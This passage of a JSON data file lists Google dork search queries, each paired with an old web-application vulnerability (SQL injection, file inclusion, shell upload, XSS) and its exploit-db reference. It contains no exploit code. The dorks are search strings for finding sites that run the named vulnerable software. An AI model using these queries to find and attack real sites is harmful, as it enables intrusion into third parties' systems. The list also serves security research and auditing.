NovaBoard v1.1.2\"", "description": "NovaBoard v1.1.2 SQL Injection Vulnerability - CVE: 2010-0608: https://www.exploit-db.com/exploits/11278"}, {"dork": "inurl:/downlot.php?file=", "description": "Lokomedia CMS (sukaCMS) Local File Disclosure Vulnerability - CVE: 2010-2018: https://www.exploit-db.com/exploits/12651"}, {"dork": "inurl:\"read.asp?fID=\"", "description": "JiRo?s FAQ Manager (read.asp fID) SQL Injection Vulnerability - CVE: 2008-2691: https://www.exploit-db.com/exploits/5753"}, {"dork": "\"Powered By The Black Lily 2007\"", "description": "Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/4444"}, {"dork": "inurl:\"simpleblog3\"", "description": "SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7232"}, {"dork": "allinurl:/m2f_usercp.php?", "description": "mail2forum phpBB Mod 1.2 (m2f_root_path) Remote Include Vulns - CVE: 2006-3735: https://www.exploit-db.com/exploits/2019"}, {"dork": "powered by Dreampics Builder", "description": "Dreampics Builder (page) Remote SQL Injection Vulnerability - CVE: 2008-3119: https://www.exploit-db.com/exploits/6034"}, {"dork": "inurl:\"classifide_ad.php\"", "description": "AJ Auction 6.2.1 (classifide_ad.php) SQL Injection Vulnerability - CVE: 2008-5212: https://www.exploit-db.com/exploits/5591"}, {"dork": "inurl:/jobsearchengine/", "description": "I-Net MLM Script Engine SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14080"}, {"dork": "allinurl:\"com_n-gallery\"", "description": "Mambo Component n-gallery Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/5980"}, {"dork": "inurl:com_pinboard", "description": "Joomla Component com_pinboard Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/9011"}, {"dork": "\"\u00c2\u00a9 2005-2006 Powered by eSyndiCat Link Exchange Script\"", "description": "eSyndiCat Link Exchange Script 2005-2006 SQL Injection Vulnerability - CVE: 2007-6543: https://www.exploit-db.com/exploits/4791"}, {"dork": "cat_sell.php?cid= or selloffers.php?cid=", "description": "B2B Trading Marketplace SQL Injection Vulnerability - CVE: 2005-3937: https://www.exploit-db.com/exploits/10656"}, {"dork": "\"Powered By Azadi Network\"", "description": "Azadi Network (page) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10830"}, {"dork": "\"Powered by i-pos Storefront\"", "description": "I-Pos Internet Pay Online Store 1.3 Beta SQL Injection Vulnerability - CVE: 2008-2634: https://www.exploit-db.com/exploits/5717"}, {"dork": "intitle:\"ASP inline corporate calendar\" inurl:.asp?id=", "description": "ASP Inline Corporate Calendar (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2009-2243: https://www.exploit-db.com/exploits/8756"}, {"dork": "inurl:friend.php?op=FriendSend", "description": "PHP-Nuke 'friend.php' Module Remote SQL Injection: https://www.exploit-db.com/exploits/12525"}, {"dork": "inurl:com_gamesbox", "description": "Joomla Component Gamesbox com_gamesbox 1.0.2 (id) SQL Injection Vulnerability - CVE: 2010-2690: https://www.exploit-db.com/exploits/14126"}, {"dork": "\"Powered by INVOhost\"", "description": "INVOhost SQL Injection - CVE: 2010-1336: https://www.exploit-db.com/exploits/11874"}, {"dork": "\"Powered by WebStudio eHotel\"", "description": "WebStudio eHotel (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5293: https://www.exploit-db.com/exploits/7222"}, {"dork": "inurl:com_redshop", "description": "Joomla redSHOP Component v1.0 (com_redshop pid) SQL Injection Vulnerability - CVE: 2010-2694: https://www.exploit-db.com/exploits/14312"}, {"dork": "\"Powered by yacs\"", "description": "YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/8066"}, {"dork": "\"(C) by CyberTeddy\"", "description": "WebLog (index.php file) Remote File Disclosure Vulnerability - CVE: 2007-1487: https://www.exploit-db.com/exploits/3484"}, {"dork": "\"Powered by Shout!\"", "description": "ShoutCMS (content.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11305"}, {"dork": "\"2007 BookmarkX script\"", "description": "BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability - CVE: 2008-0695: https://www.exploit-db.com/exploits/5040"}, {"dork": "Doop CMS", "description": "doop CMS 1.3.7 (page) Local File Inclusion Vulnerability - CVE: 2007-5465: https://www.exploit-db.com/exploits/4536"}, {"dork": "\"powered by sazcart\"", "description": "SazCart 1.5 (cart.php) Remote File Include Vulnerability - CVE: 2006-5727: https://www.exploit-db.com/exploits/2718"}, {"dork": "inurl:com_community", "description": "Joomla Template BizWeb com_community Persistent XSS Vulnerability: https://www.exploit-db.com/exploits/13955"}, {"dork": "allinurl:\"/questcms/\"", "description": "Questcms (XSS/Directory Traversal/SQL) Multiple Remote Vulnerabilities - CVE: 2008-4773: https://www.exploit-db.com/exploits/6853"}, {"dork": "inurl:news.php?mode=voir", "description": "TR News 2.1 (nb) Remote SQL Injection Vulnerability - CVE: 2008-1957: https://www.exploit-db.com/exploits/5483"}, {"dork": "\" Powered by Pie Cart Pro \"", "description": "Pie Cart Pro (Home_Path) Remote File Include Vulnerability - CVE: 2006-4970: https://www.exploit-db.com/exploits/2392"}, {"dork": "inurl:index.php?ini[langpack]=", "description": "Weatimages 1.7.1 ini[langpack] Remote File Inclusion Vulnerability - CVE: 2007-1999: https://www.exploit-db.com/exploits/3700"}, {"dork": "allinurl:\"channel_detail.php?chid=\"", "description": "YouTube Clone Script (msg.php id) Remote SQL Injection Vulnerability - CVE: 2007-3518: https://www.exploit-db.com/exploits/4136"}, {"dork": "inurl:apages.php", "description": "Arab Network Tech. (ANT) CMS SQL Injection: https://www.exploit-db.com/exploits/11339"}, {"dork": "\"Designed & Developed by net-finity\"", "description": "net-finity (links.php) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/4629"}, {"dork": "intext:Powered by CPA Site Solutions", "description": "CPA Site Solutions Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/11365"}, {"dork": "ClearBudget v0.6.1", "description": "ClearBudget 0.6.1 Insecure Cookie Handling / LFI Vulnerabilities: https://www.exploit-db.com/exploits/7992"}, {"dork": "inurl:func=selectcat + com_remository", "description": "Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability - CVE: 2007-4505: https://www.exploit-db.com/exploits/4306"}, {"dork": "\"ShopMaker v1.0\"", "description": "ShopMaker 1.0 (product.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6799"}, {"dork": "\"Powered by jSite 1.0 OE\"", "description": "jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities - CVE: 2008-3192: https://www.exploit-db.com/exploits/6057"}, {"dork": "Powered by Online Email Manager", "description": "Online Email Manager Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/8476"}, {"dork": "\"Web Site Design by Red Cat Studios\"", "description": "Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12776"}, {"dork": "inurl:\"webboard/view.php?topic=\"", "description": "Webboard v.2.90 beta Remote File Disclosure Vulnerability - CVE: 2009-2600: https://www.exploit-db.com/exploits/8823"}, {"dork": "/index.php?option=com_restaurante", "description": "Joomla Component Restaurante Remote File Upload Vulnerability - CVE: 2007-4817: https://www.exploit-db.com/exploits/4383"}, {"dork": "inurl:\"com_portfol\"", "description": "Joomla Component Portfol (vcatid) SQL Injection Vulnerability - CVE: 2009-0494: https://www.exploit-db.com/exploits/7734"}, {"dork": "intitle:\"DUcalendar 1.0\"", "description": "DUcalendar 1.0 (detail.asp iEve) Remote SQL Injection Vulnerability - CVE: 2008-2868: https://www.exploit-db.com/exploits/5927"}, {"dork": "inurl:/infusions/e_cart", "description": "PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability - CVE: 2009-0832: https://www.exploit-db.com/exploits/7698"}, {"dork": "allinurl:flashblog.html \"flashblog\"", "description": "FlashBlog (articulo_id) Remote SQL Injection Vulnerability - CVE: 2008-2572: https://www.exploit-db.com/exploits/5685"}, {"dork": "com_easybook", "description": "Joomla Component EasyBook 1.1 (gbid) SQL Injection - CVE: 2008-2569: https://www.exploit-db.com/exploits/5740"}, {"dork": "inurl:index.php?option=com_nicetalk", "description": "Joomla Component Nice Talk 0.9.3 (tagid) SQL Injection Vulnerability - CVE: 2007-4503: https://www.exploit-db.com/exploits/4308"}, {"dork": "Powered by CMScout (c)2005 CMScout Group", "description": "CMScout (XSS/HTML Injection) Multiple Vulnerabilities - CVE: 2010-2154: https://www.exploit-db.com/exploits/12806"}, {"dork": "powered by minimal Gallery 0.8", "description": "minimal Gallery 0.8 Remote File Disclosure Vulnerability - CVE: 2008-0259: https://www.exploit-db.com/exploits/4902"}, {"dork": "powered by sX-Shop", "description": "sX-Shop (view_image.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14557"}, {"dork": "inurl:\"com_ignitegallery\"", "description": "Joomla Component Ignite Gallery 0.8.3 SQL Injection Vulnerability - CVE: 2008-6182: https://www.exploit-db.com/exploits/6723"}, {"dork": "inurl:com_brightweblinks", "description": "Joomla Component com_brightweblinks (catid) SQL Injection Vulnerability - CVE: 2008-3083: https://www.exploit-db.com/exploits/5993"}, {"dork": "Powered by odlican.net cms v.1.5", "description": "odlican.net cms v.1.5 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/11340"}, {"dork": "Powered By form2list", "description": "form2list (page.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8348"}, {"dork": "inurl:/_blogadata/", "description": "Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability - CVE: 2008-1763: https://www.exploit-db.com/exploits/5368"}, {"dork": "SPBOARD v4.5", "description": "Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability - CVE: 2008-4873: https://www.exploit-db.com/exploits/6864"}, {"dork": "inurl:com_jmarket", "description": "joomla com_jmarket SQLi Vulnerability: https://www.exploit-db.com/exploits/13799"}, {"dork": "inurl:com_jtickets", "description": "joomla com_jtickets SQLi Vulnerability: https://www.exploit-db.com/exploits/13797"}, {"dork": "inurl:\"com_rwcards\"", "description": "Joomla Component com_rwcards - Local File Inclusion: https://www.exploit-db.com/exploits/11772"}, {"dork": "\"index.php?sbjoke_id=\"", "description": "Jokes & Funny Pics Script (sb_jokeid) SQL Injection Vulnerability - CVE: 2008-2874: https://www.exploit-db.com/exploits/5934"}, {"dork": "\"This website was created with phpWebThings\"", "description": "phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability - CVE: 2006-6042: https://www.exploit-db.com/exploits/2811"}, {"dork": "inurl:questions.php?idcat", "description": "EsFaq 2.0 (idcat) Remote SQL Injection Vulnerability - CVE: 2008-3952: https://www.exploit-db.com/exploits/6383"}, {"dork": "photokorn 1.52", "description": "PhotoKorn Gallery 1.52 (dir_path) Remote File Include Vulnerabilities - CVE: 2006-4670: https://www.exploit-db.com/exploits/2327"}, {"dork": "Powered by SAPID CMF Build 87", "description": "SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: https://www.exploit-db.com/exploits/5097"}, {"dork": "inurl:\"directory.php?cat=\" pubs", "description": "Prozilla Pub Site Directory (directory.php cat) SQL Injection Vulnerbility - CVE: 2007-4258: https://www.exploit-db.com/exploits/4265"}, {"dork": "inurl:\"userjournals.php?blog.\"", "description": "e107 Plugin userjournals_menu (blog.id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8417"}, {"dork": "inurl:\"com_youtube\"", "description": "Joomla Component (com_youtube) SQL Injection Vulnerability - CVE: 2010-2923: https://www.exploit-db.com/exploits/14467"}, {"dork": "inurl:\"index.php?serverid=\"", "description": "Ultrastats 0.2.144/0.3.11 (index.php serverid) SQL Injection Vulnerability - CVE: 2008-6260: https://www.exploit-db.com/exploits/7148"}, {"dork": "inurl:\"com_photoblog\"", "description": "Joomla (com_photoblog) Blind Sql Injection Vulnerability - CVE: 2010-0610: https://www.exploit-db.com/exploits/11337"}, {"dork": "inurl:indexmess.php", "description": "Messagerie Locale (centre.php) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/2832"}, {"dork": "Powered by phpFaber URLInn. Copyright \u00c2\u00a9 2004-2006 phpFaber", "description": "phpFaber URLInn 2.0.5 (dir_ws) Remote File Inclusion Vulnerability - CVE: 2007-5754: https://www.exploit-db.com/exploits/4588"}, {"dork": "inurl:com_joomradio", "description": "Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability - CVE: 2008-2633: https://www.exploit-db.com/exploits/5729"}, {"dork": "inurl:com_jnewsletter", "description": "joomla com_jnewsletter SQLi Vulnerability: https://www.exploit-db.com/exploits/13804"}, {"dork": "inurl:inc_classifiedlistingsmanager.asp", "description": "DMXReady Classified Listings Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0426: https://www.exploit-db.com/exploits/7767"}, {"dork": "Powered by Online Guestbook Pro", "description": "Online Guestbook Pro (display) Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8475"}, {"dork": "inurl:\"track.php?id=\"", "description": "phpstore Wholesale (track.php?id) SQL Injection Vulnerability - CVE: 2008-5493: https://www.exploit-db.com/exploits/7134"}, {"dork": "inurl:com_jcommunity", "description": "joomla com_jcommunity SQLi Vulnerability: https://www.exploit-db.com/exploits/13798"}, {"dork": "/modules/tadbook2/open_book.php?book_sn=", "description": "XOOPS Module tadbook2 (open_book.php book_sn) SQL Injection Vuln: https://www.exploit-db.com/exploits/7725"}, {"dork": "''links.asp?CatId''", "description": "ASPapp (links.asp CatId) Remote SQL Injection Vulnerability - CVE: 2008-1430: https://www.exploit-db.com/exploits/5276"}, {"dork": "inurl:\"search_form.php?sb_showresult=\"", "description": "Getacoder clone (sb_protype) Remote SQL Injection Vulnerability - CVE: 2008-3372: https://www.exploit-db.com/exploits/6143"}, {"dork": "Powered by boastMachine v3.1", "description": "boastMachine 3.1 (mail.php id) SQL Injection Vulnerability - CVE: 2008-0422: https://www.exploit-db.com/exploits/4952"}, {"dork": "\"index.php?section=post_upload\"", "description": "DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability: https://www.exploit-db.com/exploits/7629"}, {"dork": "Copyright 2007, PHPAUCTION.NET", "description": "phpAuction 3.2.1 (item.php id) Remote SQL Injection Vulnerability - CVE: 2008-2900: https://www.exploit-db.com/exploits/5892"}, {"dork": "Online Booking Manager2.2", "description": "Online Booking Manager 2.2 (id) SQL Injection Vulnerability - CVE: 2008-5194: https://www.exploit-db.com/exploits/5964"}, {"dork": "\"cms SunLight 5.2\"", "description": "SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities - CVE: 2007-2774: https://www.exploit-db.com/exploits/3953"}, {"dork": "option=com_paxxgallery", "description": "Joomla Component paxxgallery 0.2 (gid) Blind SQL Injection: https://www.exploit-db.com/exploits/5514"}, {"dork": "inurl:index.php?option=com_NeoRecruit", "description": "Joomla Component NeoRecruit 1.4 (id) SQL Injection Vulnerability - CVE: 2007-4506: https://www.exploit-db.com/exploits/4305"}, {"dork": "\"Powered by Battle Blog\"", "description": "Battle Blog 1.25 (comment.asp) Remote SQL Injection Vulnerability - CVE: 2008-2626: https://www.exploit-db.com/exploits/5731"}, {"dork": "inurl:\"vcalendar_asp\"", "description": "VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7180"}, {"dork": "inurl:\"com_simpledownload\"", "description": "Joomla Component simpledownload Local File Disclosure - CVE: 2010-2122: https://www.exploit-db.com/exploits/12623"}, {"dork": "allinurl :\"/modules/tutorials/\"", "description": "XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability - CVE: 2008-1351: https://www.exploit-db.com/exploits/5245"}, {"dork": "powered by joovili", "description": "Joovili 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability - CVE: 2007-6621: https://www.exploit-db.com/exploits/4799"}, {"dork": "intext:Powered by SaphpLesson 4.0", "description": "SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2883: https://www.exploit-db.com/exploits/9248"}, {"dork": "infusions/triscoop_race_system/race_details.php?", "description": "PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln: https://www.exploit-db.com/exploits/6684"}, {"dork": "intext:\"Event List 0.8 Alpha by schlu.net \"", "description": "Joomla Component EventList 0.8 (did) SQL Injection Vulnerability - CVE: 2007-4509: https://www.exploit-db.com/exploits/4309"}, {"dork": "developed by ARWScripts.com", "description": "Free Photo Gallery Site Script (path) File Disclosure Vulnerability - CVE: 2008-1730: https://www.exploit-db.com/exploits/5419"}, {"dork": "\"powered by CMS Made Simple version 1.1.2\"", "description": "CMS Made Simple 1.2 Remote Code Execution Vulnerability - CVE: 2007-5056: https://www.exploit-db.com/exploits/4442"}, {"dork": "inurl:\"view.php?ItemID=\" rating \"rate this review\"", "description": "Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability - CVE: 2008-1783: https://www.exploit-db.com/exploits/5387"}, {"dork": "\"Webdesign Cosmos Solutions\"", "description": "Cosmos Solutions cms SQL Injection Vulnerability ( id= / page= ): https://www.exploit-db.com/exploits/12794"}, {"dork": "inurl:cal_cat.php?op=", "description": "Calendarix (cal_cat.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14393"}, {"dork": "inurl:com_liveticker", "description": "Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln - CVE: 2008-6148: https://www.exploit-db.com/exploits/7573"}, {"dork": "intext:\"Powered by the 1-2-3 music store\"", "description": "Easybe 1-2-3 Music Store (process.php) Remote SQL Injection Vuln - CVE: 2007-3520: https://www.exploit-db.com/exploits/4134"}, {"dork": "?action=pro_show and ?action=disppro", "description": "EPShop 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-3412: https://www.exploit-db.com/exploits/6139"}, {"dork": "Powered by WebspotBlogging", "description": "bspotBlogging 3.0.1 (path) Remote File Include Vulnerability - CVE: 2006-2860: https://www.exploit-db.com/exploits/1871"}, {"dork": "\"powered by vsp stats processor\"", "description": "vsp stats processor 0.45 (gamestat.php gameID) SQL Injection Vuln - CVE: 2009-1224: https://www.exploit-db.com/exploits/8331"}, {"dork": "inurl:employer_profile.php?compid=", "description": "ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3706: https://www.exploit-db.com/exploits/6249"}, {"dork": "inurl:com_awd_song", "description": "Joomla JE Awd Song Component Persistent XSS Vulnerability - CVE: 2010-2613: https://www.exploit-db.com/exploits/14059"}, {"dork": "\"MangoBery 1.0 Alpha\"", "description": "MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability - CVE: 2007-1837: https://www.exploit-db.com/exploits/3598"}, {"dork": "inurl:view_group.php?id=", "description": "BookMarks Favourites Script (view_group.php id) SQL Injection Vuln - CVE: 2008-6007: https://www.exploit-db.com/exploits/6637"}, {"dork": "allinurl: \"index.php?p=gallerypic img_id\"", "description": "Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability - CVE: 2008-6210: https://www.exploit-db.com/exploits/5415"}, {"dork": "allinurl:com_jpad", "description": "Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth) - CVE: 2008-4715: https://www.exploit-db.com/exploits/5493"}, {"dork": "allinurl:\"com_candle\"", "description": "Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5221"}, {"dork": "\"powered by FlatPress\"", "description": "FlatPress 0.909.1 Stored XSS Vulnerability: https://www.exploit-db.com/exploits/12034"}, {"dork": "inurl:ugroups.php?UID=", "description": "TubeGuru Video Sharing Script (UID) SQL Injection Vulnerability - CVE: 2008-3674: https://www.exploit-db.com/exploits/6170"}, {"dork": "allinurl:option=com_livechat", "description": "Joomla Live Chat (SQL/Proxy) Multiple Remote Vulnerabilities - CVE: 2008-6883: https://www.exploit-db.com/exploits/7441"}, {"dork": "Powered by phpMyDesktop|arcade v1.0 (final)", "description": "PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) RFI Vulnerability: https://www.exploit-db.com/exploits/4755"}, {"dork": "inurl:com_products \"intCategoryId\"", "description": "Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11691"}, {"dork": "inurl:index.php?mod=jeuxflash", "description": "KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability - CVE: 2007-4922: https://www.exploit-db.com/exploits/4400"}, {"dork": "inurl:\"track.php?id=\"", "description": "SFS EZ BIZ PRO (track.php id) Remote SQL Injection Vulnerability - CVE: 2008-6245: https://www.exploit-db.com/exploits/6910"}, {"dork": "\"Ladder Scripts by\"", "description": "My Gaming Ladder 7.5 (ladderid) SQL Injection Vulnerability - CVE: 2008-1791: https://www.exploit-db.com/exploits/5401"}, {"dork": "\"powergap\" or \"s04.php\" or s01.php or s02.php", "description": "POWERGAP 2003 (s0x.php) Remote File Include Vulnerability - CVE: 2006-4236: https://www.exploit-db.com/exploits/2201"}, {"dork": "\"PKs Movie Database\"", "description": "PKs Movie Database 3.0.3 XSS / SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/5095"}, {"dork": "inurl:enq/big.asp?id=", "description": "(big.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12533"}, {"dork": "allintext:\"Powered By Buddy Zone\"", "description": "Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-3549: https://www.exploit-db.com/exploits/4127"}, {"dork": "intext:\" Website Design and Hosting By Netricks, Inc.\"", "description": "Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12736"}, {"dork": "com_thyme", "description": "Joomla Component Thyme 1.0 (event) SQL Injection Vulnerability - CVE: 2008-6116: https://www.exploit-db.com/exploits/7182"}, {"dork": "\"PHP WEBQUEST VERSION \" or inurl:\"/phpwebquest/\"", "description": "PHP Webquest 2.6 Get Database Credentials Vulnerability - CVE: 2008-0249: https://www.exploit-db.com/exploits/4872"}, {"dork": "All right reserved 2002-2003 (MSN/Web Server Creator)", "description": "Web Server Creator - Web Portal v 0.1 Multi Vulnerability - CVE: 2010-1113: https://www.exploit-db.com/exploits/11569"}, {"dork": "\"Powerd by www.e-webtech.com\"", "description": "e-webtech (page.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12571"}, {"dork": "powered by PhpMesFilms", "description": "PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability - CVE: 2009-0598: https://www.exploit-db.com/exploits/7660"}, {"dork": "\"Internet Photoshow - Slideshow\"", "description": "Internet Photoshow (Special Edition) Insecure Cookie Handling Vuln - CVE: 2008-2282: https://www.exploit-db.com/exploits/5617"}, {"dork": "inurl:choosecard.php?catid=", "description": "WEBBDOMAIN Post Card 1.02 (catid) SQL Injection Vulnerability - CVE: 2008-6622: https://www.exploit-db.com/exploits/6977"}, {"dork": "\"Powered by Real Estate Portal\"", "description": "NetArtMedia Real Estate Portal 1.2 (ad_id) SQL Injection Vuln - CVE: 2008-5309: https://www.exploit-db.com/exploits/7208"}, {"dork": "inurl:browsecats.php?cid=", "description": "PozScripts Classified Ads Script (cid) SQL Injection Vulnerability - CVE: 2008-3672: https://www.exploit-db.com/exploits/6169"}, {"dork": "inurl:com_mdigg", "description": "Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln - CVE: 2008-6149: https://www.exploit-db.com/exploits/7574"}, {"dork": "inurl:trr.php?id=", "description": "Ad Board (id) Remote SQL Injection Vulnerability - CVE: 2008-3725: https://www.exploit-db.com/exploits/6271"}, {"dork": "inurl:\"kroax.php?category\"", "description": "PHP-Fusion Mod Kroax 4.42 (category) SQL Injection Vulnerability - CVE: 2008-5196: https://www.exploit-db.com/exploits/5942"}, {"dork": "\"Powered by Reciprocal Links Manager\"", "description": "Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability - CVE: 2008-4086: https://www.exploit-db.com/exploits/6349"}, {"dork": "intext:\"Powered by eDocStore\"", "description": "eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability - CVE: 2007-3452: https://www.exploit-db.com/exploits/4108"}, {"dork": "Powered by AM4SS 1.0", "description": "Advneced Management For Services Sites (File Disclosure) Vulnerabilities: https://www.exploit-db.com/exploits/12859"}, {"dork": "\"Powered by AlstraSoft SendIt Pro\"", "description": "AlstraSoft SendIt Pro Remote File Upload Vulnerability - CVE: 2008-6932: https://www.exploit-db.com/exploits/7101"}, {"dork": "inurl:com_content", "description": "Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln - CVE: 2008-6923: https://www.exploit-db.com/exploits/6025"}, {"dork": "inurl:\"index.php?option=com_huruhelpdesk\"", "description": "Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability - CVE: 2010-2907: https://www.exploit-db.com/exploits/14449"}, {"dork": "Powered by Article Directory", "description": "Authenication Bypass Vulnerability in Articles Directory: https://www.exploit-db.com/exploits/12445"}, {"dork": "\"Copyright 2005 Affiliate Directory\"", "description": "SFS Affiliate Directory (id) SQL Injection Vulnerability - CVE: 2008-3719: https://www.exploit-db.com/exploits/6270"}, {"dork": "inurl:\"index.php?option=com_bookjoomlas\"", "description": "Joomla Component com_bookjoomlas 0.1 SQL Injection Vulnerability - CVE: 2009-1263: https://www.exploit-db.com/exploits/8353"}, {"dork": "DevMass Shopping Cart", "description": "DevMass Shopping Cart 1.0 Remote File Include Vulnerability - CVE: 2007-6133: https://www.exploit-db.com/exploits/4642"}, {"dork": "inurl:index.php?option=com_allhotels", "description": "Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability - CVE: 2008-5874: https://www.exploit-db.com/exploits/7568"}, {"dork": "\"powered by aflog\"", "description": "aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies - CVE: 2008-4784: https://www.exploit-db.com/exploits/6818"}, {"dork": "inurl:\"index.php?option=com_simplefaq\"", "description": "Mambo Component SimpleFAQ 2.11 Remote SQL Injection Vulnerability - CVE: 2007-4456: https://www.exploit-db.com/exploits/4296"}, {"dork": "inurl:couponsite/index.php?page=", "description": "Coupon Script 4.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-4090: https://www.exploit-db.com/exploits/6348"}, {"dork": "inurl:\"directory.php?ax=list\" gaming", "description": "Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5374"}, {"dork": "\"script by RECIPE SCRIPT\"", "description": "The Recipe Script 5 Remote XSS Vulnerability: https://www.exploit-db.com/exploits/8967"}, {"dork": "inurl:\"index.php?option=com_jobline\"", "description": "Joomla Component Jobline 1.3.1 Blind SQL Injection Vulnerability - CVE: 2009-2554: https://www.exploit-db.com/exploits/9187"}, {"dork": "Dosya Yukle Scrtipi v1.0", "description": "Dosya Yukle Scrtipi v1.0 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11620"}, {"dork": "allinurl: modules-php-op-modload \"req view_cat\"", "description": "PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability - CVE: 2008-0827: https://www.exploit-db.com/exploits/5147"}, {"dork": "\"Powered by Absolute File Send\"", "description": "Absolute File Send 1.0 Remote Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6881"}, {"dork": "inurl:wapmain.php?option=", "description": "Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12440"}, {"dork": "allinurl:\"com_na_content\"", "description": "Mambo Component Sermon 0.2 (gid) SQL Injection Vulnerability - CVE: 2008-0721: https://www.exploit-db.com/exploits/5076"}, {"dork": "inurl:\"com_jcalpro\"", "description": "Joomla Component com_jcalpro 1.5.3.6 Remote File Inclusion - CVE: 2009-4431: https://www.exploit-db.com/exploits/10587"}, {"dork": "Powered by Webiz", "description": "(Webiz) local SHELL Upload Vulnerability: https://www.exploit-db.com/exploits/12797"}, {"dork": "inurl:category.php?cate_id=", "description": "GC Auction Platinum (cate_id) Remote SQL Injection Vulnerability - CVE: 2008-3413: https://www.exploit-db.com/exploits/6144"}, {"dork": "CaLogic Calendars V1.2.2", "description": "CaLogic Calendars 1.2.2 (CLPath) Remote File Include Vulnerabilities - CVE: 2006-2570: https://www.exploit-db.com/exploits/1809"}, {"dork": "\"Powered by Rock Band CMS 0.10\"\t", "description": "BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities - CVE: 2009-3252: https://www.exploit-db.com/exploits/9553"}, {"dork": "Copyright Acme 2008", "description": "AJ HYIP ACME (news.php id) Remote SQL Injection Vulnerability - CVE: 2008-2893: https://www.exploit-db.com/exploits/5890"}, {"dork": "\"Creative Guestbook\"", "description": "Creative Guestbook 1.0 Multiple Remote Vulnerabilities - CVE: 2007-1479: https://www.exploit-db.com/exploits/3489"}, {"dork": "\"DeeEmm CMS\"", "description": "DeeEmm CMS (DMCMS) 0.7.4 Multiple Remote Vulnerabilities - CVE: 2008-3721: https://www.exploit-db.com/exploits/6250"}, {"dork": "powered by vBulletin 4.0.4", "description": "VBbuletin 4.0.4 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/14686"}, {"dork": "\"Vivid Ads Shopping Cart\"", "description": "Vivid Ads Shopping Cart (prodid) Remote SQL Injection: https://www.exploit-db.com/exploits/10297"}, {"dork": "inurl:\"/rbfminc/\"", "description": "RogioBiz_PHP_file_manager_V1.2 bypass admin: https://www.exploit-db.com/exploits/11731"}, {"dork": "intext:Powered by AWCM v2.1", "description": "AWCM 2.1 Local File Inclusion / Auth Bypass Vulnerabilities - CVE: 2009-3219: https://www.exploit-db.com/exploits/9237"}, {"dork": "\"Powered By AlstraSoft AskMe Pro\"", "description": "AlstraSoft AskMe Pro 2.1 Multiple SQL Injection 